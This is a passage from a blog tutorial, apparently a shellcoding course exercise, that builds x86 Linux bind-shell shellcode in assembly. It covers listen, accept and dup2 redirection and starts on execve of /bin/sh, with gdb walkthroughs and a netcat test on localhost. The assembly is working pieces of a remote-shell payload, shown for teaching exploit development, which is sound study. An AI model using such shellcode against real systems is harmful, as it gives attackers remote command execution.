successful.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220420202956.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>Next, we look at the <strong>listen<\/strong> and <strong>accept<\/strong> syscalls.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">Listening for connections<\/h3>\n\n\n\n<p>Now, we look at the call to the <strong>listen()<\/strong> function, which is used to listen for connections on the created socket.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220419203221.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>The <strong>listen()<\/strong> function has the following function header:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: cpp; gutter: false; title: ; notranslate\" title=\"\">\nint listen(int sockfd, int backlog);\n<\/pre><\/div>\n\n\n<p>Querying the socketcall documentation in net.h, we note that the socketcall number for <strong>listen()<\/strong> has a value of <strong>4<\/strong>.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220419203537.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">listen() arguments<\/h3>\n\n\n\n<p>Next, we look at each of the parameters to the <strong>listen()<\/strong> function.<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">sockfd<\/h4>\n\n\n\n<p>The sockfd argument is a file descriptor that refers to the socket we are going to listen on.<\/p>\n\n\n\n<p>This value can be set to the file descriptor of the previously established socket. Following the previous call to <strong>bind()<\/strong>, the socket descriptor was saved to the <strong>EDX<\/strong> register.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220420202303.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\">backlog<\/h4>\n\n\n\n<p>The backlog argument refers to the maximum number of pending connections for the socket.<\/p>\n\n\n\n<p>In case a connection request is made when this number is exceeded, the client will receive an <strong>ECONNREFUSED<\/strong> response.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">listen() argument structure<\/h3>\n\n\n\n<p>A breakdown of the arguments to <strong>listen()<\/strong> is as follows:<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table><thead><tr><th>Syscall<\/th><th>Argument<\/th><th>Man Reference<\/th><th>C Code Reference<\/th><\/tr><\/thead><tbody><tr><td>socketcall<\/td><td>call<\/td><td>Syscall number<\/td><td>-<\/td><\/tr><tr><td>socketcall<\/td><td>args<\/td><td>Arguments<\/td><td>-<\/td><\/tr><tr><td>listen<\/td><td>sockfd<\/td><td>Socket file descriptor<\/td><td>host_sockid<\/td><\/tr><tr><td>listen<\/td><td>backlog<\/td><td>Maximum number of socket connections<\/td><td>2<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<p>Now that we know the initial values to set up the listener, we can implement this in assembly.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">Calling listen()<\/h3>\n\n\n\n<p>In case of our system call to <strong>socketcall()<\/strong>:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>EAX<\/strong> - system call number (102)<\/li>\n\n\n\n<li><strong>EBX<\/strong> - call argument - listen (4)<\/li>\n\n\n\n<li><strong>ECX<\/strong> - *args - listen arguments<\/li>\n<\/ul>\n\n\n\n<p>To begin, we must push the values of <strong>backlog<\/strong> and <strong>sockfd<\/strong> to the stack in reverse order.<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>sockfd - stored in EDX after call to <strong>bind()<\/strong>. We will push this value to the stack for use with <strong>listen()<\/strong><\/li>\n\n\n\n<li>backlog - arbitrary, we set this to 2 (0x2).<\/li>\n<\/ul>\n\n\n\n<p>The overall argument structure for calling <strong>listen()<\/strong> will be as follows:<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table><thead><tr><th>Syscall<\/th><th>argument<\/th><th>Description<\/th><th>Value<\/th><\/tr><\/thead><tbody><tr><td>socketcall<\/td><td>syscall<\/td><td>Syscall value for socketcall<\/td><td>0x66<\/td><\/tr><tr><td>socketcall<\/td><td>call<\/td><td>Socketcall value for listen<\/td><td>0x4<\/td><\/tr><tr><td>listen<\/td><td>sockfd<\/td><td>Socket file descriptor<\/td><td>0x3<\/td><\/tr><tr><td>listen<\/td><td>backlog<\/td><td>Maximum number of pending connections<\/td><td>0x2<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">listen() assembly code<\/h3>\n\n\n\n<p>The assembly code for the <strong>listen()<\/strong> function is as follows:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; title: ; notranslate\" title=\"\">\n_listen:\n\n        ; Clear EAX regster and set al to syscall number 102 in hex.\n        mov al, 0x66\n\n        ; Clear EBX register and set bl to 0x4 for listen()\n        mov bl, 0x4\n\n        ; Push arguments to stack for call to listen()\n        push byte 0x2\n        push edx\n\n        ; set ECX to the top of the stack to point to args\n        mov ecx, esp\n\n        ; Execute listen() syscall\n        int 0x80\n<\/pre><\/div>\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">listen() analysis<\/h3>\n\n\n\n<p>We can now step through our implementation of <strong>listen()<\/strong> using gdb.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220420203800.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>Defining hook-stop for the scope of the <strong>listen()<\/strong> assembly code:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\n(gdb) define hook-stop\nType commands for definition of &quot;hook-stop&quot;.\nEnd with a line saying just &quot;end&quot;.\n&gt;print\/x $eax\n&gt;print\/x $ebx\n&gt;print\/x $ecx\n&gt;print\/x $edx\n&gt;x\/4xw $esp\n&gt;disassemble 0x8049031\n&gt;end\n<\/pre><\/div>\n\n\n<p>The syscall is set up for the call to <strong>listen()<\/strong>, having moved <strong>0x4<\/strong> to the <strong>bl<\/strong> register:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220420204040.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>The values for the backlog and socket descriptor are pushed to the stack, where <strong>ECX<\/strong> will point to them.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220420204142.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>The <strong>ESP<\/strong> value is moved to the <strong>ECX<\/strong> register, so that <strong>ECX<\/strong> is pointing to the correct values as per the function arguments for <strong>listen()<\/strong>.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220420204406.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>We note that the value of the <strong>EAX<\/strong> register, which stores the return value is <strong>0<\/strong>, indicating a successful call to <strong>listen()<\/strong>.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220420204506.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>Next, we look at the <strong>accept<\/strong> syscall, which is the final parameter we need to implement the initial TCP bind connection.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">Accepting a connection<\/h3>\n\n\n\n<p>Next, we look at the call to the <strong>accept()<\/strong> function, which is used to accept a connection request made by a client.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220419210310.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>The <strong>accept()<\/strong> function has the following header:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: cpp; gutter: false; title: ; notranslate\" title=\"\">\nint accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen);\n<\/pre><\/div>\n\n\n<p>Querying the socketcall documentation in net.h indicates that the socketcall for <strong>accept()<\/strong> has a value of <strong>5<\/strong>.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220419210458.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">accept() arguments<\/h3>\n\n\n\n<p>Next, we look at each of the parameters to the <strong>accept()<\/strong> function.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\">sockfd<\/h4>\n\n\n\n<p>The&nbsp;<strong>sockfd<\/strong>&nbsp;parameter is the file descriptor of the socket. This value was returned following a successful call to the&nbsp;<strong>listen()<\/strong>&nbsp;function and, following the syscall, is stored in the EDX register.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220420202303.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\">addr<\/h4>\n\n\n\n<p>The addr argument is a pointer to the sockaddr structure. This structure is populated by the operating system with the address of the connecting socket. This means it does not need to be specified by the programmer.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">addrlen<\/h3>\n\n\n\n<p>The addrlen argument is a pointer to the size of addr. This value is also populated by the OS so will not be provided by the programmer.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">accept() argument structure<\/h3>\n\n\n\n<p>A breakdown of the arguments to <strong>accept()<\/strong> is as follows:<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table><thead><tr><th>Syscall<\/th><th>Argument<\/th><th>Man Reference<\/th><th>C Code Reference<\/th><\/tr><\/thead><tbody><tr><td>socketcall<\/td><td>call<\/td><td>Syscall number<\/td><td>-<\/td><\/tr><tr><td>socketcall<\/td><td>args<\/td><td>Arguments<\/td><td>-<\/td><\/tr><tr><td>accept<\/td><td>sockfd<\/td><td>Socket file descriptor<\/td><td>host_sockid<\/td><\/tr><tr><td>accept<\/td><td>addr<\/td><td>Socket address family, host IP address and port<\/td><td>NULL<\/td><\/tr><tr><td>accept<\/td><td>addrlen<\/td><td>Size in bytes of addr<\/td><td>NULL<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<p>Now that we know the initial values to accept connections, we can implement this in assembly.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">Calling accept()<\/h3>\n\n\n\n<p>In case of our system call to <strong>socketcall()<\/strong>:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>EAX<\/strong> - system call number (102)<\/li>\n\n\n\n<li><strong>EBX<\/strong> - call argument - accept (5)<\/li>\n\n\n\n<li><strong>ECX<\/strong> - *args - accept arguments<\/li>\n<\/ul>\n\n\n\n<p>To begin, we must push the values of addrlen, addr and sockfd to the stack in reverse order. The values of addrlen and addr will be NULL.<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>sockfd - stored in EDX after call to <strong>listen()<\/strong>. We will push this value to the stack to be used once again.<\/li>\n\n\n\n<li>addr - NULL<\/li>\n\n\n\n<li>addrlen - NULL<\/li>\n<\/ul>\n\n\n\n<p>The overall argument structure for calling <strong>accept()<\/strong> will be as follows:<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table><thead><tr><th>Syscall<\/th><th>Argument<\/th><th>Description<\/th><th>Value<\/th><\/tr><\/thead><tbody><tr><td>socketcall<\/td><td>syscall<\/td><td>Syscall value for socketcall<\/td><td>0x66<\/td><\/tr><tr><td>socketcall<\/td><td>call<\/td><td>Socketcall value for accept<\/td><td>0x5<\/td><\/tr><tr><td>accept<\/td><td>sockfd<\/td><td>Socket file descriptor<\/td><td>0x3<\/td><\/tr><tr><td>accept<\/td><td>addr<\/td><td>Pointer to sockaddr_in structure<\/td><td>0x0<\/td><\/tr><tr><td>accept<\/td><td>addrlen<\/td><td>Length of addr in bytes<\/td><td>0x0<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">accept() assembly code<\/h3>\n\n\n\n<p>The assembly code for the <strong>accept()<\/strong> function is as follows:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; title: ; notranslate\" title=\"\">\n_accept:\n\n        ; Clear EAX register and set al to syscall number 102 in hex.\n        mov al, 0x66\n\n        ; Clear EBX register and set bl to 0x5 for accept()\n        mov bl, 0x5\n\n        ; Clear ECX and push arguments for call to accept()\n        xor ecx, ecx\n        push ecx;               addrlen - NULL\n        push ecx;               addr - NULL\n        push edx;               sockfd - stored in EDX\n\n        ; Set ECX to stack for call to accept()\n        mov ecx, esp\n\n        ; Execute accept() syscall\n        int 0x80\n<\/pre><\/div>\n\n\n<h3 class=\"wp-block-heading\">accept() analysis<\/h3>\n\n\n\n<p>We can now step through our implementation of <strong>accept()<\/strong> using gdb.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220420205927.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>We once again define our hook-stop for the scope of the <strong>accept()<\/strong> assembly code:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\n(gdb) define hook-stop\nType commands for definition of &quot;hook-stop&quot;.\nEnd with a line saying just &quot;end&quot;.\n&gt;print\/x $eax\n&gt;print\/x $ebx\n&gt;print\/x $ecx\n&gt;print\/x $edx\n&gt;x\/4xw $esp\n&gt;disassemble 0x804903c\n&gt;end\n<\/pre><\/div>\n\n\n<p>The syscall is set up for the call to <strong>accept()<\/strong>, having moved <strong>0x5<\/strong> to the <strong>bl<\/strong> register:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220420210245.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>The arguments to <strong>accept()<\/strong> are then pushed to the stack.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220420210336.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>The <strong>ESP<\/strong> value is moved to the <strong>ECX<\/strong> register, so that <strong>ECX<\/strong> is pointing to the addr values as per the function arguments for&nbsp;<strong>accept()<\/strong>.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220420210539.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>This time when the syscall is made, the program appears to hang. This is because after the call to <strong>accept()<\/strong> the program awaits a connection from a client.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220420210640.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>In a separate terminal, we can use netcat to connect to localhost on TCP port 4444.<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nnc localhost 4444\n<\/pre><\/div>\n\n\n<p>When we do this and check gdb again, we see that the program continues execution and finishes.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220420210736.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>The EAX register containing the return value of the call to <strong>accept()<\/strong> is populated with the value <strong>0x4<\/strong>, which corresponds to the socket descriptor for the connected client socket.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220420210811.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">Making the shell interactive<\/h3>\n\n\n\n<p>Now that we have a working bind shell implementation in assembly, we next work on making it interactive.<\/p>\n\n\n\n<p>The example C program does this by setting the file descriptors for the client socket to the STDIN, STDOUT and STDERR on the host system.<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: cpp; title: ; notranslate\" title=\"\">\n\/\/ Duplicate file descriptors for STDIN, STDOUT and STDERR \n    dup2(client_sockid, 0); \n    dup2(client_sockid, 1); \n    dup2(client_sockid, 2); \n<\/pre><\/div>\n\n\n<p>The manual entry for this functionality is as follows:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220419213155.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>The <strong>dup2()<\/strong> function, which is used by the C program has the following function header:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: cpp; gutter: false; title: ; notranslate\" title=\"\">\nint dup2(int oldfd, int newfd);\n<\/pre><\/div>\n\n\n<p>To locate the syscall number for <strong>dup2()<\/strong>, we can query unistd_32.h and grep for the function name like so:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\ncat  \/usr\/include\/i386-linux-gnu\/asm\/unistd_32.h | grep dup2\n\n#define __NR_dup2 63\n<\/pre><\/div>\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220419214121.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>We determine the syscall number of <strong>dup2()<\/strong> is <strong>63<\/strong>, which in hex is <strong>0x3F<\/strong>.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">dup2() arguments<\/h3>\n\n\n\n<p>Next, we look at each of the parameters to the <strong>dup2()<\/strong> function.<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">oldfd<\/h4>\n\n\n\n<p>The oldfd argument is a file descriptor. In this case, we set it to the file descriptor of the established socket.<\/p>\n\n\n\n<p>This value can be set to the file descriptor of the previously established socket. Following the call to&nbsp;<strong>accept()<\/strong>, the socket descriptor was saved to the <strong>EDX<\/strong> register.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220420210811.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\">newfd<\/h4>\n\n\n\n<p>The newfd argument is the file descriptor we are redirecting into the socket.<\/p>\n\n\n\n<p>As we are aiming to redirect STDIN, STDOUT and STDERR to the socket connection, this value will be set to 0, 1 and 2 on each subsequent syscall.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">dup2() argument structure<\/h3>\n\n\n\n<p>A breakdown of the arguments to <strong>dup2()<\/strong> is as follows:<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table><thead><tr><th>Syscall<\/th><th>Argument<\/th><th>Man Reference<\/th><th>C Code Reference<\/th><\/tr><\/thead><tbody><tr><td>dup2<\/td><td>oldfd<\/td><td>Socket file descriptor<\/td><td>host_sockid<\/td><\/tr><tr><td>dup2<\/td><td>newfd<\/td><td>New file descriptor<\/td><td>0, 1 and 2<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">Calling dup2()<\/h3>\n\n\n\n<p>In case of our system call to <strong>dup2()<\/strong>:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>EAX<\/strong> - system call number (63)<\/li>\n\n\n\n<li><strong>EBX<\/strong> - oldfd, which is the sockid returned by the call to <strong>accept()<\/strong><\/li>\n\n\n\n<li><strong>ECX<\/strong> - newfd, which will iterate over 0, 1 and 2 for STDIN, STDOUT and STDERR<\/li>\n<\/ul>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">dup2() assembly code<\/h3>\n\n\n\n<p>The assembly code for the <strong>dup2()<\/strong> function is as follows:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; title: ; notranslate\" title=\"\">\n_dup2:\n\n        ; Push the EAX register containing the socket file descriptor returned from accept()\n        push eax\n\n        ; Clear EAX register and set al to syscall number 63 in hex.\n        mov al, 0x3f\n        pop ebx;                POP socket file descriptor into EBX for dup2 syscall\n        xor ecx, ecx;           Clear ECX register for initial redirection of STDIN (0)\n        int 0x80;               Execute dup2() syscall\n\n        ; Set dup2() syscall for STDOUT\n        mov al, 0x3f\n        mov cl, 0x1\n        int 0x80\n\n        ; Set dup2() syscall for STDERR\n        mov al, 0x3f\n        mov cl, 0x2\n        int 0x80\n<\/pre><\/div>\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">dup2() analysis<\/h3>\n\n\n\n<p>We can now step through our implementation of <strong>dup2()<\/strong> using gdb.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220420211507.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>Defining hook-stop for the scope of the <strong>dup2()<\/strong> assembly code:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\n(gdb) define hook-stop\nType commands for definition of &quot;hook-stop&quot;.\nEnd with a line saying just &quot;end&quot;.\n&gt;print\/x $eax\n&gt;print\/x $ebx\n&gt;print\/x $ecx\n&gt;print\/x $edx\n&gt;x\/4xw $esp\n&gt;disassemble 0x8049049\n&gt;end\n<\/pre><\/div>\n\n\n<p><strong>Note:<\/strong> We once again have to initiate a client connection in order to resume execution after the call to <strong>accept()<\/strong><\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220420211636.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>To begin, the value of <strong>EAX<\/strong>, which contains the connecting client socket descriptor is pushed to the stack.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220420211747.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>As the syscall number for <strong>dup2()<\/strong> will need to occupy <strong>EAX<\/strong>, we initially pop the value of the client socket descriptor into the <strong>EBX<\/strong> register to save it:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220420211930.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>We prep the <strong>EAX<\/strong>, <strong>EBX<\/strong> and <strong>ECX<\/strong> registers for the syscall to duplicate <strong>STDIN<\/strong>, set in <strong>ECX<\/strong> as the value <strong>0x0<\/strong>:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220420212045.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>We repeat the setup to perform the syscall for <strong>STDOUT<\/strong>, with <strong>ECX<\/strong> set to <strong>0x1<\/strong>:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220420212153.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>Finally we perform the syscall for <strong>STDERR<\/strong>, with <strong>ECX<\/strong> set to <strong>0x2<\/strong>:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220420212300.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>On each subsequent syscall, the <strong>EAX<\/strong> register returns the value of the new file descriptor (0 for STDIN, 1 for STDOUT, 2 for STDERR).<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220420212344.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">Getting a shell<\/h3>\n\n\n\n<p>Now that we have a working bind connection over TCP which performs proper I\/O redirection, we can implement a shell.<\/p>\n\n\n\n<p>Once the client connects to our waiting socket, the program needs to execute a shell program such as <strong>\/bin\/sh<\/strong> to spawn a shell.<\/p>\n\n\n\n<p>To do this, we are going to use the <strong>execve()<\/strong> syscall.<\/p>\n\n\n\n<p>As per the C shellcode, the <strong>execve()<\/strong> call is as follows:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: cpp; gutter: false; title: ; notranslate\" title=\"\">\n\/\/ Execute \/bin\/sh \nexecve(&quot;\/bin\/sh&quot;, NULL, NULL);\n<\/pre><\/div>\n\n\n<p>The manual entry for the execve functionality is as follows:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220419222245.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>The execve function has the following function header:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: cpp; gutter: false; title: ; notranslate\" title=\"\">\nint execve(const char *pathname, char *const argv&#x5B;], char *const envp&#x5B;]);\n<\/pre><\/div>\n\n\n<p>To locate the syscall number for <strong>execve()<\/strong>, we can again query the unistd_32.h file:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\ncat  \/usr\/include\/i386-linux-gnu\/asm\/unistd_32.h | grep execve \n#define __NR_execve 11\n#define __NR_execveat 358\n<\/pre><\/div>\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" 